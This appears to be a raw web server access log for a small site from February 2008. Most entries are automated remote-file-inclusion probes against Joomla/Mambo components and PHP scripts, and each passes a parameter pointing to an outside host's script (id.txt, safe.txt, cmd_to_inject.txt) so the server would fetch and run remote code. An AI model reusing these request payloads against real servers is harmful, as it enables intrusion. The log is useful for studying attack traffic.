218.189.222.164 - - [12/Feb/2008:08:21:21 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.222.164 - - [12/Feb/2008:08:21:22 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.129.198 - - [12/Feb/2008:08:23:22 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.129.198 - - [12/Feb/2008:08:23:23 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.212.34 - - [12/Feb/2008:08:26:27 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:26:35 -0800] "GET /logs/access_080117.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:26:35 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:26:36 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.178.76.98 - - [12/Feb/2008:08:26:40 -0800] "GET /logs/access_080117.log/phpATM/login.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.178.76.98 - - [12/Feb/2008:08:26:44 -0800] "GET /phpATM/login.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.178.76.98 - - [12/Feb/2008:08:26:45 -0800] "GET /logs/phpATM/login.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.59.23.86 - - [12/Feb/2008:08:27:35 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:27:43 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:27:44 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:27:45 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:28:02 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:28:02 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:28:03 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:08:30:10 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:08:30:11 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.32.131 - - [12/Feb/2008:08:30:11 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.32.131 - - [12/Feb/2008:08:30:11 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.32.131 - - [12/Feb/2008:08:30:12 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.32.131 - - [12/Feb/2008:08:30:12 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:08:31:12 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:08:31:12 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.144.55.219 - - [12/Feb/2008:08:31:50 -0800] "GET /logs/access_080117.log/phpATM/login.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [12/Feb/2008:08:31:51 -0800] "GET /phpATM/login.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [12/Feb/2008:08:31:52 -0800] "GET /logs/phpATM/login.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.95 - - [12/Feb/2008:08:32:31 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [12/Feb/2008:08:32:32 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [12/Feb/2008:08:32:32 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.166.58 - - [12/Feb/2008:08:33:31 -0800] "GET //index.php?option=com_glossary&func=display&Itemid=9&catid=7/index.php?option=com_glossary&Itemid=1&mosConfig_absolute_path=http://www.antoniodeluca.info//dmdocuments/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:08:33:33 -0800] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:08:33:33 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:08:33:34 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.166.58 - - [12/Feb/2008:08:33:37 -0800] "GET /logs//index.php?option=com_glossary&func=display&Itemid=9&catid=7/index.php?option=com_glossary&Itemid=1&mosConfig_absolute_path=http://www.antoniodeluca.info//dmdocuments/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.166.58 - - [12/Feb/2008:08:34:02 -0800] "GET /logs/access_080131.log//index.php?option=com_glossary&func=display&Itemid=9&catid=7/index.php?option=com_glossary&Itemid=1&mosConfig_absolute_path=http://www.antoniodeluca.info//dmdocuments/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:08:34:06 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:08:34:06 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
201.234.169.120 - - [12/Feb/2008:08:34:23 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
201.234.169.120 - - [12/Feb/2008:08:34:23 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.59.17.71 - - [12/Feb/2008:08:34:53 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
69.59.17.71 - - [12/Feb/2008:08:34:54 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:08:35:20 -0800] "GET /logs/access_080121.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.108 - - [12/Feb/2008:08:35:58 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.89 - - [12/Feb/2008:08:35:58 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.97.163.114 - - [12/Feb/2008:08:36:24 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
217.97.163.114 - - [12/Feb/2008:08:36:24 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
81.89.137.99 - - [12/Feb/2008:08:36:31 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.220.50 - - [12/Feb/2008:08:37:08 -0800] "GET /logs/access_080117.log/index.php?page=http://189.13.99.139/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.220.50 - - [12/Feb/2008:08:37:08 -0800] "GET /index.php?page=http://189.13.99.139/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.220.50 - - [12/Feb/2008:08:37:09 -0800] "GET /logs/index.php?page=http://189.13.99.139/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.123.56 - - [12/Feb/2008:08:37:31 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [12/Feb/2008:08:37:31 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.235.253.16 - - [12/Feb/2008:08:38:23 -0800] "GET /logs/access.log//errors.php?error=http://www.moe.go.th/bic/fileadmin/.md/ayes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.235.253.16 - - [12/Feb/2008:08:38:29 -0800] "GET //errors.php?error=http://www.moe.go.th/bic/fileadmin/.md/ayes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.235.253.16 - - [12/Feb/2008:08:38:30 -0800] "GET /logs//errors.php?error=http://www.moe.go.th/bic/fileadmin/.md/ayes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.89.137.99 - - [12/Feb/2008:08:39:28 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:08:40:18 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:08:41:21 -0800] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://www.yourhost.com/cmd_to_inject.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:08:41:24 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.yourhost.com/cmd_to_inject.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:08:41:27 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.yourhost.com/cmd_to_inject.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.233.129.198 - - [12/Feb/2008:08:43:09 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.129.198 - - [12/Feb/2008:08:43:10 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.105.237 - - [12/Feb/2008:08:44:17 -0800] "GET /logs/access_071230.log/convert/mvcw.php?step=1&vwar_root=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.105.237 - - [12/Feb/2008:08:44:18 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.35 - - [12/Feb/2008:08:44:18 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.113 - - [12/Feb/2008:08:44:18 -0800] "GET /plans/A2_MASTER_SUITE_PLAN.pdf HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
71.166.166.236 - - [12/Feb/2008:08:44:31 -0800] "GET /logs/access_071225.log//modules/4nalbum/public/displaycategory.php?basepath=http://www.acb.bs.it/moodledata/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.123.56 - - [12/Feb/2008:08:45:40 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [12/Feb/2008:08:45:40 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [12/Feb/2008:08:45:43 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [12/Feb/2008:08:45:43 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [12/Feb/2008:08:47:03 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [12/Feb/2008:08:47:06 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.30.146 - - [12/Feb/2008:08:48:00 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.crazyrc.co.uk/images/gallery/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [12/Feb/2008:08:48:05 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.crazyrc.co.uk/images/gallery/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:08:48:07 -0800] "GET /logs/access_080117.log/task.php?task=http://www.yourhost.com/cmd_to_inject.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:08:48:08 -0800] "GET /task.php?task=http://www.yourhost.com/cmd_to_inject.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:08:48:08 -0800] "GET /logs/task.php?task=http://www.yourhost.com/cmd_to_inject.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.30.146 - - [12/Feb/2008:08:48:14 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.crazyrc.co.uk/images/gallery/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [12/Feb/2008:08:48:49 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.crazyrc.co.uk/images/gallery/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:08:49:08 -0800] "GET /logs/access_080131.log//templates/mangobery/footer.sample.php?Site_Path=http://www.yourhost.com/cmd_to_inject.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:08:49:35 -0800] "GET /logs/access_080117.log/task.php?task=http://www.yourhost.com/cmd_to_inject.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:08:49:35 -0800] "GET /task.php?task=http://www.yourhost.com/cmd_to_inject.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:08:49:36 -0800] "GET /logs/task.php?task=http://www.yourhost.com/cmd_to_inject.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.234.169.120 - - [12/Feb/2008:08:51:31 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
201.234.169.120 - - [12/Feb/2008:08:51:31 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.190.195.101 - - [12/Feb/2008:08:51:54 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
213.190.195.101 - - [12/Feb/2008:08:51:54 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:08:52:32 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:08:53:05 -0800] "GET /logs/access_080108.log/ndex.php?showtopic=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:08:53:06 -0800] "GET /ndex.php?showtopic=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:08:53:06 -0800] "GET /logs/ndex.php?showtopic=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.235.253.16 - - [12/Feb/2008:08:54:19 -0800] "GET //errors.php?error=http://www.moe.go.th/bic/fileadmin/.md/ayes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.160 - - [12/Feb/2008:08:54:24 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:12 -0800] "GET /minamijewelry/html/images/wind_character.jpg HTTP/1.1" 200 2891 "http://images.google.com/imgres?imgurl=http://www.dmulk.com/minamijewelry/html/images/wind_character.jpg&imgrefurl=http://www.dmulk.com/minamijewelry/html/&h=102&w=99&sz=3&tbnid=e2R8Tgxh6DbifM:&tbnh=83&tbnw=81&hl=en&prev=/images%3Fq%3Dwind%2Bcharacter%26gbv%3D2%26hl%3Den%26safe%3Dactive&frame=small" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:32 -0800] "GET /minamijewelry/html/ HTTP/1.1" 200 13287 "http://images.google.com/imgres?imgurl=http://www.dmulk.com/minamijewelry/html/images/wind_character.jpg&imgrefurl=http://www.dmulk.com/minamijewelry/html/&h=102&w=99&sz=3&hl=en&start=20&tbnid=e2R8Tgxh6DbifM:&tbnh=83&tbnw=81&prev=/images%3Fq%3Dwind%2Bcharacter%26gbv%3D2%26hl%3Den%26safe%3Dactive" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:32 -0800] "GET /minamijewelry/html/images/flower_character.jpg HTTP/1.1" 200 3451 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:33 -0800] "GET /minamijewelry/html/images/flower_character_mos.jpg HTTP/1.1" 200 3439 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:33 -0800] "GET /minamijewelry/html/images/bird_character.jpg HTTP/1.1" 200 2668 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:33 -0800] "GET /minamijewelry/html/images/bird_character_mos.jpg HTTP/1.1" 200 2655 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:33 -0800] "GET /minamijewelry/html/images/wind_character_mos.jpg HTTP/1.1" 200 2816 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:34 -0800] "GET /minamijewelry/html/images/moon_character.jpg HTTP/1.1" 200 2499 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:34 -0800] "GET /minamijewelry/html/images/moon_character_mos.jpg HTTP/1.1" 200 2537 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:34 -0800] "GET /minamijewelry/html/images/dream_character.jpg HTTP/1.1" 200 3130 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:34 -0800] "GET /minamijewelry/html/images/dream_character_mos.jpg HTTP/1.1" 200 3143 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:34 -0800] "GET /minamijewelry/html/images/minami_jewelry_lg.jpg HTTP/1.1" 200 4890 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:35 -0800] "GET /minamijewelry/html/images/flower_lg.jpg HTTP/1.1" 200 3046 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:35 -0800] "GET /minamijewelry/html/images/bird_lg.jpg HTTP/1.1" 200 2607 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
